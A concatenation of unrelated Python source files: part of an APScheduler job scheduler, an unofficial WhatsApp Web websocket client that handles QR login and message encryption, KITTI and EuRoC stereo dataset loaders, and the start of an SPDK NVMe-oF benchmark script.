the job is still allowed to be run
:type date: :class:`datetime.date`
:rtype: :class:`~apscheduler.job.Job`
"""
trigger = SimpleTrigger(date)
return self.add_job(trigger, func, args, kwargs, **options)
def add_interval_job(self, func, weeks=0, days=0, hours=0, minutes=0,
seconds=0, start_date=None, args=None, kwargs=None,
**options):
"""
Schedules a job to be completed on specified intervals.
Any extra keyword arguments are passed along to the constructor of the
:class:`~apscheduler.job.Job` class (see :ref:`job_options`).
:param func: callable to run
:param weeks: number of weeks to wait
:param days: number of days to wait
:param hours: number of hours to wait
:param minutes: number of minutes to wait
:param seconds: number of seconds to wait
:param start_date: when to first execute the job and start the
counter (default is after the given interval)
:param args: list of positional arguments to call func with
:param kwargs: dict of keyword arguments to call func with
:param name: name of the job
:param jobstore: alias of the job store to add the job to
:param misfire_grace_time: seconds after the designated run time that
the job is still allowed to be run
:rtype: :class:`~apscheduler.job.Job`
"""
interval = timedelta(weeks=weeks, days=days, hours=hours,
minutes=minutes, seconds=seconds)
trigger = IntervalTrigger(interval, start_date)
return self.add_job(trigger, func, args, kwargs, **options)
def add_cron_job(self, func, year=None, month=None, day=None, week=None,
day_of_week=None, hour=None, minute=None, second=None,
start_date=None, args=None, kwargs=None, **options):
"""
Schedules a job to be completed on times that match the given
expressions.
Any extra keyword arguments are passed along to the constructor of the
:class:`~apscheduler.job.Job` class (see :ref:`job_options`).
:param func: callable to run
:param year: year to run on
:param month: month to run on
:param day: day of month to run on
:param week: week of the year to run on
:param day_of_week: weekday to run on (0 = Monday)
:param hour: hour to run on
:param second: second to run on
:param args: list of positional arguments to call func with
:param kwargs: dict of keyword arguments to call func with
:param name: name of the job
:param jobstore: alias of the job store to add the job to
:param misfire_grace_time: seconds after the designated run time that
the job is still allowed to be run
:return: the scheduled job
:rtype: :class:`~apscheduler.job.Job`
"""
trigger = CronTrigger(year=year, month=month, day=day, week=week,
day_of_week=day_of_week, hour=hour,
minute=minute, second=second,
start_date=start_date)
return self.add_job(trigger, func, args, kwargs, **options)
def cron_schedule(self, **options):
"""
Decorator version of :meth:`add_cron_job`.
This decorator does not wrap its host function.
Unscheduling decorated functions is possible by passing the ``job``
attribute of the scheduled function to :meth:`unschedule_job`.
Any extra keyword arguments are passed along to the constructor of the
:class:`~apscheduler.job.Job` class (see :ref:`job_options`).
"""
def inner(func):
func.job = self.add_cron_job(func, **options)
return func
return inner
def interval_schedule(self, **options):
"""
Decorator version of :meth:`add_interval_job`.
This decorator does not wrap its host function.
Unscheduling decorated functions is possible by passing the ``job``
attribute of the scheduled function to :meth:`unschedule_job`.
Any extra keyword arguments are passed along to the constructor of the
:class:`~apscheduler.job.Job` class (see :ref:`job_options`).
"""
def inner(func):
func.job = self.add_interval_job(func, **options)
return func
return inner
def get_jobs(self):
"""
Returns a list of all scheduled jobs.
:return: list of :class:`~apscheduler.job.Job` objects
"""
self._jobstores_lock.acquire()
try:
jobs = []
for jobstore in itervalues(self._jobstores):
jobs.extend(jobstore.jobs)
return jobs
finally:
self._jobstores_lock.release()
def unschedule_job(self, job):
"""
Removes a job, preventing it from being run any more.
"""
self._jobstores_lock.acquire()
try:
for alias, jobstore in iteritems(self._jobstores):
if job in list(jobstore.jobs):
self._remove_job(job, alias, jobstore)
return
finally:
self._jobstores_lock.release()
raise KeyError('Job "%s" is not scheduled in any job store' % job)
def unschedule_func(self, func):
"""
Removes all jobs that would execute the given function.
"""
found = False
self._jobstores_lock.acquire()
try:
for alias, jobstore in iteritems(self._jobstores):
for job in list(jobstore.jobs):
if job.func == func:
self._remove_job(job, alias, jobstore)
found = True
finally:
self._jobstores_lock.release()
if not found:
raise KeyError('The given function is not scheduled in this '
'scheduler')
def print_jobs(self, out=None):
"""
Prints out a textual listing of all jobs currently scheduled on this
scheduler.
:param out: a file-like object to print to (defaults to **sys.stdout**
if nothing is given)
"""
out = out or sys.stdout
job_strs = []
self._jobstores_lock.acquire()
try:
for alias, jobstore in iteritems(self._jobstores):
job_strs.append('Jobstore %s:' % alias)
if jobstore.jobs:
for job in jobstore.jobs:
job_strs.append(' %s' % job)
else:
job_strs.append(' No scheduled jobs')
finally:
self._jobstores_lock.release()
out.write(os.linesep.join(job_strs) + os.linesep)
def _run_job(self, job, run_times):
"""
Acts as a harness that runs the actual job code in a thread.
"""
for run_time in run_times:
# See if the job missed its run time window, and handle possible
# misfires accordingly
difference = datetime.now() - run_time
grace_time = timedelta(seconds=job.misfire_grace_time)
if difference > grace_time:
# Notify listeners about a missed run
event = JobEvent(EVENT_JOB_MISSED, job, run_time)
self._notify_listeners(event)
logger.warning('Run time of job "%s" was missed by %s',
job, difference)
else:
try:
job.add_instance()
except MaxInstancesReachedError:
event = JobEvent(EVENT_JOB_MISSED, job, run_time)
self._notify_listeners(event)
logger.warning('Execution of job "%s" skipped: '
'maximum number of running instances '
'reached (%d)', job, job.max_instances)
break
logger.debug('Running job "%s" (scheduled at %s)', job,
run_time)
try:
retval = job.func(*job.args, **job.kwargs)
except:
# Notify listeners about the exception
exc, tb = sys.exc_info()[1:]
event = JobEvent(EVENT_JOB_ERROR, job, run_time,
exception=exc, traceback=tb)
self._notify_listeners(event)
logger.exception('Job "%s" raised an exception', job)
else:
# Notify listeners about successful execution
event = JobEvent(EVENT_JOB_EXECUTED, job, run_time,
retval=retval)
self._notify_listeners(event)
logger.debug('Job "%s" executed successfully', job)
job.remove_instance()
# If coalescing is enabled, don't attempt any further runs
if job.coalesce:
break
def _process_jobs(self, now):
"""
Iterates through jobs in every jobstore, starts pending jobs
and figures out the next wakeup time.
"""
next_wakeup_time = None
self._jobstores_lock.acquire()
try:
for alias, jobstore in iteritems(self._jobstores):
for job in tuple(jobstore.jobs):
run_times = job.get_run_times(now)
if run_times:
logger.debug('Scheduler submitting job %s to run', job.name)
self._threadpool.submit(self._run_job, job, run_times)
# Increase the job's run count
if job.coalesce:
job.runs += 1
else:
job.runs += len(run_times)
# Update the job, but don't keep finished jobs around
if job.compute_next_run_time(
now + timedelta(microseconds=1)):
jobstore.update_job(job)
else:
self._remove_job(job, alias, jobstore)
if not next_wakeup_time:
next_wakeup_time = job.next_run_time
elif job.next_run_time:
next_wakeup_time = min(next_wakeup_time,
job.next_run_time)
return next_wakeup_time
finally:
self._jobstores_lock.release()
def _main_loop(self):
"""Executes jobs on schedule."""
logger.debug('Scheduler started')
self._notify_listeners(SchedulerEvent(EVENT_SCHEDULER_START))
self._wakeup.clear()
while not self._stopped:
logger.debug('Looking for jobs to run')
now = datetime.now()
next_wakeup_time = self._process_jobs(now)
# Sleep until the next job is scheduled to be run,
# a new job is added or the scheduler is stopped
if next_wakeup_time is not None:
wait_seconds = time_difference(next_wakeup_time, now)
logger.debug('Next wakeup is due at %s (in %f seconds)',
next_wakeup_time, wait_seconds)
try:
self._wakeup.wait(wait_seconds)
except IOError: # Catch errno 514 on some Linux kernels
pass
self._wakeup.clear()
elif self.standalone:
logger.debug('No jobs left; shutting down scheduler')
self.shutdown()
break
else:
logger.debug('No jobs; waiting until a job is added')
try:
self._wakeup.wait()
except IOError: # Catch errno 514 on some Linux kernels
pass
self._wakeup.clear()
logger.info('Scheduler has been shut down')
self._notify_listeners(SchedulerEvent(EVENT_SCHEDULER_SHUTDOWN))
|
whatsapp.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys;
sys.dont_write_bytecode = True;
import os;
import signal;
import base64;
from threading import Thread, Timer
import math;
import time;
import datetime;
import json;
import io;
from time import sleep;
from threading import Thread;
from Crypto.Cipher import AES;
from Crypto.Hash import SHA256;
import hashlib;
import hmac;
import traceback;
import websocket;
import curve25519;
import pyqrcode;
from utilities import *;
from whatsapp_binary_reader import whatsappReadBinary;
WHATSAPP_WEB_VERSION="0,4,2081"
reload(sys);
sys.setdefaultencoding("utf-8");
def HmacSha256(key, sign):
return hmac.new(key, sign, hashlib.sha256).digest();
def HKDF(key, length, appInfo=""): # implements RFC 5869, some parts from https://github.com/MirkoDziadzka/pyhkdf
key = HmacSha256("\0"*32, key);
keyStream = "";
keyBlock = "";
blockIndex = 1;
while len(keyStream) < length:
keyBlock = hmac.new(key, msg=keyBlock+appInfo+chr(blockIndex), digestmod=hashlib.sha256).digest();
blockIndex += 1;
keyStream += keyBlock;
return keyStream[:length];
def AESPad(s):
bs = AES.block_size;
return s + (bs - len(s) % bs) * chr(bs - len(s) % bs);
def to_bytes(n, length, endianess='big'):
h = '%x' % n
s = ('0'*(len(h) % 2) + h).zfill(length*2).decode('hex')
return s if endianess == 'big' else s[::-1]
def AESUnpad(s):
return s[:-ord(s[len(s)-1:])];
def AESEncrypt(key, plaintext): # like "AESPad"/"AESUnpad" from https://stackoverflow.com/a/21928790
plaintext = AESPad(plaintext);
iv = os.urandom(AES.block_size);
cipher = AES.new(key, AES.MODE_CBC, iv);
return iv + cipher.encrypt(plaintext);
def WhatsAppEncrypt(encKey, macKey, plaintext):
enc = AESEncrypt(encKey, plaintext)
return HmacSha256(macKey, enc) + enc; # this may need padding to 64 byte boundary
def AESDecrypt(key, ciphertext): # from https://stackoverflow.com/a/20868265
iv = ciphertext[:AES.block_size];
cipher = AES.new(key, AES.MODE_CBC, iv);
plaintext = cipher.decrypt(ciphertext[AES.block_size:]);
return AESUnpad(plaintext);
class WhatsAppWebClient:
websocketIsOpened = False;
onOpenCallback = None;
onMessageCallback = None;
onCloseCallback = None;
activeWs = None;
messageSentCount = 0;
websocketThread = None;
messageQueue = {}; # maps message tags (provided by WhatsApp) to more information (description and callback)
loginInfo = {
"clientId": None,
"serverRef": None,
"privateKey": None,
"publicKey": None,
"key": {
"encKey": None,
"macKey": None
}
};
connInfo = {
"clientToken": None,
"serverToken": None,
"browserToken": None,
"secret": None,
"sharedSecret": None,
"me": None
};
def __init__(self, onOpenCallback, onMessageCallback, onCloseCallback):
self.onOpenCallback = onOpenCallback;
self.onMessageCallback = onMessageCallback;
self.onCloseCallback = onCloseCallback;
websocket.enableTrace(True);
self.connect();
def onOpen(self, ws):
try:
self.websocketIsOpened = True;
if self.onOpenCallback is not None and "func" in self.onOpenCallback:
self.onOpenCallback["func"](self.onOpenCallback);
eprint("WhatsApp backend Websocket opened.");
except:
eprint(traceback.format_exc());
def onError(self, ws, error):
eprint(error);
def onClose(self, ws):
self.websocketIsOpened = False;
if self.onCloseCallback is not None and "func" in self.onCloseCallback:
self.onCloseCallback["func"](self.onCloseCallback);
eprint("WhatsApp backend Websocket closed.");
def onMessage(self, ws, message):
try:
messageSplit = message.split(",", 1);
messageTag = messageSplit[0];
messageContent = messageSplit[1];
if messageTag in self.messageQueue: # when the server responds to a client's message
pend = self.messageQueue[messageTag];
if pend["desc"] == "_status":
if messageContent[0] == 'Pong' and messageContent[1] == True:
pend["callback"]({"Connected": True,"user":self.connInfo["me"],"pushname":self.connInfo["pushname"]})
elif pend["desc"] == "_restoresession":
eprint("") # TODO implement Challenge Solving
elif pend["desc"] == "_login":
eprint("Message after login: ", message);
self.loginInfo["serverRef"] = json.loads(messageContent)["ref"];
eprint("set server id: " + self.loginInfo["serverRef"]);
self.loginInfo["privateKey"] = curve25519.Private();
self.loginInfo["publicKey"] = self.loginInfo["privateKey"].get_public();
qrCodeContents = self.loginInfo["serverRef"] + "," + base64.b64encode(self.loginInfo["publicKey"].serialize()) + "," + self.loginInfo["clientId"];
eprint("qr code contents: " + qrCodeContents);
svgBuffer = io.BytesIO(); # from https://github.com/mnooner256/pyqrcode/issues/39#issuecomment-207621532
pyqrcode.create(qrCodeContents, error='L').svg(svgBuffer, scale=6, background="rgba(0,0,0,0.0)", module_color="#122E31", quiet_zone=0);
if "callback" in pend and pend["callback"] is not None and "func" in pend["callback"] and pend["callback"]["func"] is not None and "tag" in pend["callback"] and pend["callback"]["tag"] is not None:
pend["callback"]["func"]({ "type": "generated_qr_code", "image": "data:image/svg+xml;base64," + base64.b64encode(svgBuffer.getvalue()), "content": qrCodeContents }, pend["callback"]);
else:
try:
jsonObj = json.loads(messageContent); # try reading as json
except ValueError, e:
if messageContent != "":
hmacValidation = HmacSha256(self.loginInfo["key"]["macKey"], messageContent[32:]);
if hmacValidation != messageContent[:32]:
raise ValueError("Hmac mismatch");
decryptedMessage = AESDecrypt(self.loginInfo["key"]["encKey"], messageContent[32:]);
try:
processedData = whatsappReadBinary(decryptedMessage, True);
messageType = "binary";
except:
processedData = { "traceback": traceback.format_exc().splitlines() };
messageType = "error";
finally:
self.onMessageCallback["func"](processedData, self.onMessageCallback, { "message_type": messageType });
else:
self.onMessageCallback["func"](jsonObj, self.onMessageCallback, { "message_type": "json" });
if isinstance(jsonObj, list) and len(jsonObj) > 0: # check if the result is an array
eprint(json.dumps(jsonObj));
if jsonObj[0] == "Conn":
Timer(25, lambda: self.activeWs.send('?,,')).start() # Keepalive Request
self.connInfo["clientToken"] = jsonObj[1]["clientToken"];
self.connInfo["serverToken"] = jsonObj[1]["serverToken"];
self.connInfo["browserToken"] = jsonObj[1]["browserToken"];
self.connInfo["me"] = jsonObj[1]["wid"];
self.connInfo["secret"] = base64.b64decode(jsonObj[1]["secret"]);
self.connInfo["sharedSecret"] = self.loginInfo["privateKey"].get_shared_key(curve25519.Public(self.connInfo["secret"][:32]), lambda a: a);
sse = self.connInfo["sharedSecretExpanded"] = HKDF(self.connInfo["sharedSecret"], 80);
hmacValidation = HmacSha256(sse[32:64], self.connInfo["secret"][:32] + self.connInfo["secret"][64:]);
if hmacValidation != self.connInfo["secret"][32:64]:
raise ValueError("Hmac mismatch");
keysEncrypted = sse[64:] + self.connInfo["secret"][64:];
keysDecrypted = AESDecrypt(sse[:32], keysEncrypted);
self.loginInfo["key"]["encKey"] = keysDecrypted[:32];
self.loginInfo["key"]["macKey"] = keysDecrypted[32:64];
# eprint("private key : ", base64.b64encode(self.loginInfo["privateKey"].serialize()));
# eprint("secret : ", base64.b64encode(self.connInfo["secret"]));
# eprint("shared secret : ", base64.b64encode(self.connInfo["sharedSecret"]));
# eprint("shared secret expanded : ", base64.b64encode(self.connInfo["sharedSecretExpanded"]));
# eprint("hmac validation : ", base64.b64encode(hmacValidation));
# eprint("keys encrypted : ", base64.b64encode(keysEncrypted));
# eprint("keys decrypted : ", base64.b64encode(keysDecrypted));
eprint("set connection info: client, server and browser token; secret, shared secret, enc key, mac key");
eprint("logged in as " + jsonObj[1]["pushname"] + " (" + jsonObj[1]["wid"] + ")");
elif jsonObj[0] == "Stream":
pass;
elif jsonObj[0] == "Props":
pass;
except:
eprint(traceback.format_exc());
def connect(self):
self.activeWs = websocket.WebSocketApp("wss://web.whatsapp.com/ws",
on_message = lambda ws, message: self.onMessage(ws, message),
on_error = lambda ws, error: self.onError(ws, error),
on_open = lambda ws: self.onOpen(ws),
on_close = lambda ws: self.onClose(ws),
header = { "Origin: https://web.whatsapp.com" });
self.websocketThread = Thread(target = self.activeWs.run_forever);
self.websocketThread.daemon = True;
self.websocketThread.start();
def generateQRCode(self, callback=None):
self.loginInfo["clientId"] = base64.b64encode(os.urandom(16));
messageTag = str(getTimestamp());
self.messageQueue[messageTag] = { "desc": "_login", "callback": callback };
message = messageTag + ',["admin","init",['+ WHATSAPP_WEB_VERSION + '],["Chromium at ' + datetime.datetime.now().isoformat() + '","Chromium"],"' + self.loginInfo["clientId"] + '",true]';
self.activeWs.send(message);
def restoreSession(self, callback=None):
messageTag = str(getTimestamp())
message = messageTag + ',["admin","init",['+ WHATSAPP_WEB_VERSION + '],["Chromium at ' + datetime.now().isoformat() + '","Chromium"],"' + self.loginInfo["clientId"] + '",true]'
self.activeWs.send(message)
messageTag = str(getTimestamp())
self.messageQueue[messageTag] = {"desc": "_restoresession"}
message = messageTag + ',["admin","login","' + self.connInfo["clientToken"] + '", "' + self.connInfo[
"serverToken"] + '", "' + self.loginInfo["clientId"] + '", "takeover"]'
self.activeWs.send(message)
def getLoginInfo(self, callback):
callback["func"]({ "type": "login_info", "data": self.loginInfo }, callback);
def getConnectionInfo(self, callback):
callback["func"]({ "type": "connection_info", "data": self.connInfo }, callback);
def sendTextMessage(self, number, text):
messageId = "3EB0"+binascii.hexlify(Random.get_random_bytes(8)).upper()
messageTag = str(getTimestamp())
messageParams = {"key": {"fromMe": True, "remoteJid": number + "@s.whatsapp.net", "id": messageId},"messageTimestamp": getTimestamp(), "status": 1, "message": {"conversation": text}}
msgData = ["action", {"type": "relay", "epoch": str(self.messageSentCount)},[["message", None, WAWebMessageInfo.encode(messageParams)]]]
encryptedMessage = WhatsAppEncrypt(self.loginInfo["key"]["encKey"], self.loginInfo["key"]["macKey"],whatsappWriteBinary(msgData))
payload = bytearray(messageId) + bytearray(",") + bytearray(to_bytes(WAMetrics.MESSAGE, 1)) + bytearray([0x80]) + encryptedMessage
self.messageSentCount = self.messageSentCount + 1
self.messageQueue[messageId] = {"desc": "__sending"}
self.activeWs.send(payload, websocket.ABNF.OPCODE_BINARY)
def status(self, callback=None):
if self.activeWs is not None:
messageTag = str(getTimestamp())
self.messageQueue[messageTag] = {"desc": "_status", "callback": callback}
message = messageTag + ',["admin", "test"]'
self.activeWs.send(message)
def disconnect(self):
self.activeWs.send('goodbye,,["admin","Conn","disconnect"]'); # WhatsApp server closes connection automatically when client wants to disconnect
#time.sleep(0.5);
#self.activeWs.close();
|
dataset.py
|
import numpy as np
import cv2
import os
import time
from collections import defaultdict, namedtuple
from threading import Thread, Lock
from multiprocessing import Process, Queue
class ImageReader(object):
def __init__(self, ids, timestamps, cam=None):
self.ids = ids
self.timestamps = timestamps
self.cam = cam
self.cache = dict()
self.idx = 0
self.ahead = 10 # 10 images ahead of current index
self.waiting = 1.5 # waiting time
self.preload_thread = Thread(target=self.preload)
self.thread_started = False
def read(self, path):
img = cv2.imread(path, -1)
if self.cam is None:
return img
else:
return self.cam.rectify(img)
def preload(self):
idx = self.idx
t = float('inf')
while True:
if time.time() - t > self.waiting:
return
if self.idx == idx:
time.sleep(1e-2)
continue
for i in range(self.idx, self.idx + self.ahead):
if i not in self.cache and i < len(self.ids):
self.cache[i] = self.read(self.ids[i])
if self.idx + self.ahead > len(self.ids):
return
idx = self.idx
t = time.time()
def __len__(self):
return len(self.ids)
def __getitem__(self, idx):
self.idx = idx
# if not self.thread_started:
# self.thread_started = True
# self.preload_thread.start()
if idx in self.cache:
img = self.cache[idx]
del self.cache[idx]
else:
img = self.read(self.ids[idx])
return img
def __iter__(self):
for i, timestamp in enumerate(self.timestamps):
yield timestamp, self[i]
@property
def dtype(self):
return self[0].dtype
@property
def shape(self):
return self[0].shape
class KITTIOdometry(object): # without lidar
'''
path example: 'path/to/your/KITTI odometry dataset/sequences/00'
'''
def __init__(self, path):
Cam = namedtuple('cam', 'fx fy cx cy width height baseline')
cam00_02 = Cam(718.856, 718.856, 607.1928, 185.2157, 1241, 376, 0.5371657)
cam03 = Cam(721.5377, 721.5377, 609.5593, 172.854, 1242, 375, 0.53715)
cam04_12 = Cam(707.0912, 707.0912, 601.8873, 183.1104, 1226, 370, 0.53715)
path = os.path.expanduser(path)
self.left, self.right, self.timestamps = self.load_images(path)
assert len(self.left) == len(self.right)
sequence = int(path.strip(os.path.sep).split(os.path.sep)[-1])
if sequence < 3:
self.cam = cam00_02
elif sequence == 3:
self.cam = cam03
elif sequence < 13:
self.cam = cam04_12
def load_images(self, path_to_sequence):
timestamps = []
with open(os.path.join(path_to_sequence, 'times.txt')) as times_file:
for line in times_file:
if len(line) > 0:
timestamps.append(float(line))
return [
os.path.join(path_to_sequence, 'image_2', "{0:06}.png".format(idx))
for idx in range(len(timestamps))
], [
os.path.join(path_to_sequence, 'image_3', "{0:06}.png".format(idx))
for idx in range(len(timestamps))
], timestamps
def __len__(self):
return len(self.left)
class Camera(object):
def __init__(self,
width, height,
intrinsic_matrix,
undistort_rectify=False,
extrinsic_matrix=None,
distortion_coeffs=None,
rectification_matrix=None,
projection_matrix=None):
self.width = width
self.height = height
self.intrinsic_matrix = intrinsic_matrix
self.extrinsic_matrix = extrinsic_matrix
self.distortion_coeffs = distortion_coeffs
self.rectification_matrix = rectification_matrix
self.projection_matrix = projection_matrix
self.undistort_rectify = undistort_rectify
self.fx = intrinsic_matrix[0, 0]
self.fy = intrinsic_matrix[1, 1]
self.cx = intrinsic_matrix[0, 2]
self.cy = intrinsic_matrix[1, 2]
if undistort_rectify:
self.remap = cv2.initUndistortRectifyMap(
cameraMatrix=self.intrinsic_matrix,
distCoeffs=self.distortion_coeffs,
R=self.rectification_matrix,
newCameraMatrix=self.projection_matrix,
size=(width, height),
m1type=cv2.CV_8U)
else:
self.remap = None
def rectify(self, img):
if self.remap is None:
return img
else:
return cv2.remap(img, *self.remap, cv2.INTER_LINEAR)
class StereoCamera(object):
def __init__(self, left_cam, right_cam):
self.left_cam = left_cam
self.right_cam = right_cam
self.width = left_cam.width
self.height = left_cam.height
self.intrinsic_matrix = left_cam.intrinsic_matrix
self.extrinsic_matrix = left_cam.extrinsic_matrix
self.fx = left_cam.fx
self.fy = left_cam.fy
self.cx = left_cam.cx
self.cy = left_cam.cy
self.baseline = abs(right_cam.projection_matrix[0, 3] /
right_cam.projection_matrix[0, 0])
self.focal_baseline = self.fx * self.baseline
class EuRoCDataset(object): # Stereo + IMU
'''
path example: 'path/to/your/EuRoC Mav dataset/MH_01_easy'
'''
def __init__(self, path, rectify=True):
self.left_cam = Camera(
width=752, height=480,
intrinsic_matrix = np.array([
[458.654, 0.000000, 367.215],
[0.000000, 457.296, 248.375],
[0.000000, 0.000000, 1.000000]]),
undistort_rectify=rectify,
distortion_coeffs = np.array(
[-0.28340811, 0.07395907, 0.00019359, 1.76187114e-05, 0.000000]),
rectification_matrix = np.array([
[0.999966347530033, -0.001422739138722922, 0.008079580483432283],
[0.001365741834644127, 0.9999741760894847, 0.007055629199258132],
[-0.008089410156878961, -0.007044357138835809, 0.9999424675829176]]),
projection_matrix = np.array([
[435.2046959714599, 0, 367.4517211914062, 0],
[0, 435.2046959714599, 252.2008514404297, 0],
[0., 0, 1, 0]]),
extrinsic_matrix = np.array([
[0.0148655429818, -0.999880929698, 0.00414029679422, -0.0216401454975],
[0.999557249008, 0.0149672133247, 0.025715529948, -0.064676986768],
[-0.0257744366974, 0.00375618835797, 0.999660727178, 0.00981073058949],
[0.0, 0.0, 0.0, 1.0]])
)
self.right_cam = Camera(
width=752, height=480,
intrinsic_matrix = np.array([
[457.587, 0.000000, 379.999],
[0.000000, 456.134, 255.238],
[0.000000, 0.000000, 1.000000]]),
undistort_rectify=rectify,
distortion_coeffs = np.array(
[-0.28368365, 0.07451284, -0.00010473, -3.555907e-05, 0.0]),
rectification_matrix = np.array([
[0.9999633526194376, -0.003625811871560086, 0.007755443660172947],
[0.003680398547259526, 0.9999684752771629, -0.007035845251224894],
[-0.007729688520722713, 0.007064130529506649, 0.999945173484644]]),
projection_matrix = np.array([
[435.2046959714599, 0, 367.4517211914062, -47.90639384423901],
[0, 435.2046959714599, 252.2008514404297, 0],
[0, 0, 1, 0]]),
extrinsic_matrix = np.array([
[0.0125552670891, -0.999755099723, 0.0182237714554, -0.0198435579556],
[0.999598781151, 0.0130119051815, 0.0251588363115, 0.0453689425024],
[-0.0253898008918, 0.0179005838253, 0.999517347078, 0.00786212447038],
[0.0, 0.0, 0.0, 1.0]])
)
path = os.path.expanduser(path)
self.left = ImageReader(
*self.list_imgs(os.path.join(path, 'mav0', 'cam0', 'data')),
self.left_cam)
self.right = ImageReader(
*self.list_imgs(os.path.join(path, 'mav0', 'cam1', 'data')),
self.right_cam)
assert len(self.left) == len(self.right)
self.timestamps = self.left.timestamps
self.cam = StereoCamera(self.left_cam, self.right_cam)
def list_imgs(self, dir):
xs = [_ for _ in os.listdir(dir) if _.endswith('.png')]
xs = sorted(xs, key=lambda x:float(x[:-4]))
timestamps = [float(_[:-4]) * 1e-9 for _ in xs]
return [os.path.join(dir, _) for _ in xs], timestamps
def __len__(self):
return len(self.left)
|
run_nvmf.py
|
#!/usr/bin/env python3
import os
import re
import sys
import json
import paramiko
import zipfile
import threading
import subprocess
import itertools
import time
import uuid
import rpc
import rpc.client
from common import *
class Server:
def __init__(self, name, username, password, mode, nic_ips, transport):
self.name = name
self.mode = mode
self.username = username
self.password = password
self.nic_ips = nic_ips
self.transport = transport.lower()
if not re.match("^[A-Za-z0-9]*$", name):
self.log_print("Please use a name which contains only letters or numbers")
sys.exit(1)
def log_print(self, msg):
print("[%s] %s" % (self.name, msg), flush=True)
class Target(Server):
def __init__(self, name, username, password, mode, nic_ips, transport="rdma", use_null_block=False, sar_settings=None):
super(Target, self).__init__(name, username, password, mode, nic_ips, transport)
self.null_block = bool(use_null_block)
self.enable_sar = False
if sar_settings:
self.enable_sar, self.sar_delay, self.sar_interval, self.sar_count = sar_settings
self.script_dir = os.path.dirname(os.path.abspath(sys.argv[0]))
self.spdk_dir = os.path.abspath(os.path.join(self.script_dir, "../../../"))
def zip_spdk_sources(self, spdk_dir, dest_file):
self.log_print("Zipping SPDK source directory")
fh = zipfile.ZipFile(dest_file, "w", zipfile.ZIP_DEFLATED)
for root, directories, files in os.walk(spdk_dir, followlinks=True):
for file in files:
fh.write(os.path.relpath(os.path.join(root, file)))
fh.close()
self.log_print("Done zipping")
def read_json_stats(self, file):
with open(file, "r") as json_data:
data = json.load(json_data)
job_pos = 0 # job_post = 0 because using aggregated results
# Check if latency is in nano or microseconds to choose correct dict key
def get_lat_unit(key_prefix, dict_section):
# key prefix - lat, clat or slat.
# dict section - portion of json containing latency bucket in question
# Return dict key to access the bucket and unit as string
for k, v in dict_section.items():
if k.startswith(key_prefix):
return k, k.split("_")[1]
read_iops = float(data["jobs"][job_pos]["read"]["iops"])
read_bw = float(data["jobs"][job_pos]["read"]["bw"])
lat_key, lat_unit = get_lat_unit("lat", data["jobs"][job_pos]["read"])
read_avg_lat = float(data["jobs"][job_pos]["read"][lat_key]["mean"])
read_min_lat = float(data["jobs"][job_pos]["read"][lat_key]["min"])
read_max_lat = float(data["jobs"][job_pos]["read"][lat_key]["max"])
clat_key, clat_unit = get_lat_unit("clat", data["jobs"][job_pos]["read"])
read_p99_lat = float(data["jobs"][job_pos]["read"][clat_key]["percentile"]["99.000000"])
if "ns" in lat_unit:
read_avg_lat, read_min_lat, read_max_lat = [x / 1000 for x in [read_avg_lat, read_min_lat, read_max_lat]]
if "ns" in clat_unit:
read_p99_lat = read_p99_lat / 1000
write_iops = float(data["jobs"][job_pos]["write"]["iops"])
write_bw = float(data["jobs"][job_pos]["write"]["bw"])
lat_key, lat_unit = get_lat_unit("lat", data["jobs"][job_pos]["write"])
write_avg_lat = float(data["jobs"][job_pos]["write"][lat_key]["mean"])
write_min_lat = float(data["jobs"][job_pos]["write"][lat_key]["min"])
write_max_lat = float(data["jobs"][job_pos]["write"][lat_key]["max"])
clat_key, clat_unit = get_lat_unit("clat", data["jobs"][job_pos]["write"])
write_p99_lat = float(data["jobs"][job_pos]["write"][clat_key]["percentile"]["99.000000"])
if "ns" in lat_unit:
write_avg_lat, write_min_lat, write_max_lat = [x / 1000 for x in [write_avg_lat, write_min_lat, write_max_lat]]
if "ns" in clat_unit:
write_p99_lat = write_p99_lat / 1000
return [read_iops, read_bw, read_avg_lat, read_min_lat, read_max_lat, read_p99_lat,
write_iops, write_bw, write_avg_lat, write_min_lat, write_max_lat, write_p99_lat]
def parse_results(self, results_dir, initiator_count=None, run_num=None):
files = os.listdir(results_dir)
fio_files = filter(lambda x: ".fio" in x, files)
json_files = [x for x in files if ".json" in x]
# Create empty results file
csv_file = "nvmf_results.csv"
with open(os.path.join(results_dir, csv_file), "w") as fh:
header_line = ",".join(["Name",
"read_iops", "read_bw", "read_avg_lat_us",
"read_min_lat_us", "read_max_lat_us", "read_p99_lat_us",
"write_iops", "write_bw", "write_avg_lat_us",
"write_min_lat_us", "write_max_lat_us", "write_p99_lat_us"])
fh.write(header_line + "\n")
rows = set()
for fio_config in fio_files:
self.log_print("Getting FIO stats for %s" % fio_config)
job_name, _ = os.path.splitext(fio_config)
# If "_CPU" exists in name - ignore it
# Initiators for the same job could have diffrent num_cores parameter
job_name = re.sub(r"_\d+CPU", "", job_name)
job_result_files = [x for x in json_files if job_name in x]
self.log_print("Matching result files for current fio config:")
for j in job_result_files:
self.log_print("\t %s" % j)
# There may have been more than 1 initiator used in test, need to check that
# Result files are created so that string after last "_" separator is server name
inits_names = set([os.path.splitext(x)[0].split("_")[-1] for x in job_result_files])
inits_avg_results = []
for i in inits_names:
self.log_print("\tGetting stats for initiator %s" % i)
# There may have been more than 1 test run for this job, calculate average results for initiator
i_results = [x for x in job_result_files if i in x]
separate_stats = []
for r in i_results:
stats = self.read_json_stats(os.path.join(results_dir, r))
separate_stats.append(stats)
self.log_print(stats)
z = [sum(c) for c in zip(*separate_stats)]
z = [c/len(separate_stats) for c in z]
inits_avg_results.append(z)
self.log_print("\tAverage results for initiator %s" % i)
self.log_print(z)
# Sum average results of all initiators running this FIO job
self.log_print("\tTotal results for %s from all initiators" % fio_config)
for a in inits_avg_results:
self.log_print(a)
total = ["{0:.3f}".format(sum(c)) for c in zip(*inits_avg_results)]
rows.add(",".join([job_name, *total]))
# Save results to file
for row in rows:
with open(os.path.join(results_dir, csv_file), "a") as fh:
fh.write(row + "\n")
self.log_print("You can find the test results in the file %s" % os.path.join(results_dir, csv_file))
def measure_sar(self, results_dir, sar_file_name):
self.log_print("Waiting %d delay before measuring SAR stats" % self.sar_delay)
time.sleep(self.sar_delay)
out = subprocess.check_output("sar -P ALL %s %s" % (self.sar_interval, self.sar_count), shell=True).decode(encoding="utf-8")
with open(os.path.join(results_dir, sar_file_name), "w") as fh:
for line in out.split("\n"):
if "Average" in line and "CPU" in line:
self.log_print("Summary CPU utilization from SAR:")
self.log_print(line)
if "Average" in line and "all" in line:
self.log_print(line)
